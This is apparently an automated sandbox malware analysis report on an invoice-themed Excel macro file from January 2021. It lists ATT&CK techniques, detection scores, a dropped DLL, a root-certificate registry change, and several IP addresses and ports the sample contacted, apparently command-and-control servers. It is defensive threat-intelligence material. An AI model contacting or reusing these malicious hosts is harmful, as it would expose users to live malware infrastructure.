Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery14Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
INV8222874744_20210111490395.xlsm43%ReversingLabsScript-Macro.Trojan.Remcos

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bjcbglsw.dll100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://5.100.228.233:3389/0%Avira URL Cloudsafe
https://5.100.228.233:3389/T0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://77.220.64.37/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://46.105.131.65:1512/t0%Avira URL Cloudsafe
https://46.105.131.65:1512/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://5.100.228.233:3389/7Q0%Avira URL Cloudsafe
https://80.86.91.27:3308/0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
media-server.skyinternet.com.pk
217.174.149.3
truefalse
    unknown
    cdn.digicertcdn.com
    104.18.10.39
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.windows.com/pctv.DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpfalse
        high
        https://5.100.228.233:3389/regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://investor.msn.comDWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtDWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpfalse
            high
            https://5.100.228.233:3389/Tregsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpfalse
              high
              http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://77.220.64.37/regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueDWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeDWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpfalse
                high
                https://46.105.131.65:1512/tregsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://46.105.131.65:1512/regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckDWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpfalse
                  high
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.icra.org/vocabulary/.DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmpfalse
                    high
                    https://5.100.228.233:3389/7Qregsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://80.86.91.27:3308/regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://investor.msn.com/DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpfalse
                      high
                      http://www.%s.comPAregsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpfalse
                        high
                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2392785990.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392840096.0000000001CC0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2238957386.0000000002310000.00000002.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          217.174.149.3
                          unknownBulgaria
                          31083TELEPOINTBGfalse
                          5.100.228.233
                          unknownNetherlands
                          8315SENTIANLtrue
                          80.86.91.27
                          unknownGermany
                          8972GD-EMEA-DC-SXB1DEtrue
                          46.105.131.65
                          unknownFrance
                          16276OVHFRtrue
                          77.220.64.37
                          unknownItaly
                          44160INTERNETONEInternetServicesProviderITtrue

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:338363
                          Start date:12.01.2021
                          Start time:07:42:27
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 7m 49s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:INV8222874744_20210111490395.xlsm
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • GSI enabled (VBA)
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.bank.expl.evad.winXLSM@9/23@1/5
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 4.9% (good quality ratio 4.8%)
                          • Quality average: 81.6%
                          • Quality standard deviation: 20%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xlsm
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Attach to Office via COM
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240, 67.26.73.254, 8.253.95.249, 8.248.139.254, 8.253.95.121, 67.27.157.254, 104.42.151.234, 104.18.10.39
                          • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, wu.azureedge.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, blobcollector.events.data.trafficmanager.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          07:42:52API Interceptor1721x Sleep call for process: regsvr32.exe modified
                          07:43:08API Interceptor510x Sleep call for process: DWWIN.EXE modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          217.174.149.322RFQ-SN PO1859082- Product list sheet.exeGet hashmaliciousBrowse
                          • www.fahadsajjad.com/la/?9r=1s32RKhxSM5r5OBY21oGJgF7tYpevBQtjY1gcno/uy3lctFL4yzyHtIBou7DbnEva0j68xDPlZY/eEdRlbSl&ZFQdPr=Ip4tMf
                          5.100.228.233Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                            xad05r9ba.dllGet hashmaliciousBrowse
                              mcluc5u.dllGet hashmaliciousBrowse
                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                  INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                    HkNkyKl3uT.dllGet hashmaliciousBrowse
                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                        sample20210111-01.xlsmGet hashmaliciousBrowse
                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                            hiytvys.dllGet hashmaliciousBrowse
                                              l7rgi3xyd.dllGet hashmaliciousBrowse
                                                ymuyks.dllGet hashmaliciousBrowse
                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                    hy9x6wzip.dllGet hashmaliciousBrowse
                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                        jufk0vrar.dllGet hashmaliciousBrowse
                                                          80.86.91.27Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                            xad05r9ba.dllGet hashmaliciousBrowse
                                                              mcluc5u.dllGet hashmaliciousBrowse
                                                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                  INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                    HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                        sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                            hiytvys.dllGet hashmaliciousBrowse
                                                                              l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                    hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                        jufk0vrar.dllGet hashmaliciousBrowse
                                                                                          46.105.131.65Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                            xad05r9ba.dllGet hashmaliciousBrowse
                                                                                              mcluc5u.dllGet hashmaliciousBrowse
                                                                                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                  INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                    HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                      ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                        sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                            hiytvys.dllGet hashmaliciousBrowse
                                                                                                              l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                ymuyks.dllGet hashmaliciousBrowse
                                                                                                                  INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                    hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                      INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                        jufk0vrar.dllGet hashmaliciousBrowse

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          cdn.digicertcdn.comInv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          SurfsharkSetup.exeGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          RFQ.docGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39
                                                                                                                          https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.11.39
                                                                                                                          https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                                                                                                                          • 104.18.10.39

                                                                                                                          ASN

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          GD-EMEA-DC-SXB1DEInv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          xad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                          • 80.86.91.27
                                                                                                                          hiytvys.dllGet hashmaliciousBrowse
